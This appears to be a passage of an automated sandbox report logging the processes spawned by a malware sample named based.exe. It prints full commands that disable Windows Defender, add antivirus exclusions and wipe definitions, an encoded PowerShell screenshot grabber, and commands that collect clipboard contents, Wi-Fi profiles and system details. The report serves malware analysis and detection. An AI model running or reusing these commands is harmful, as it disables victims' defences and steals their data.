                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaa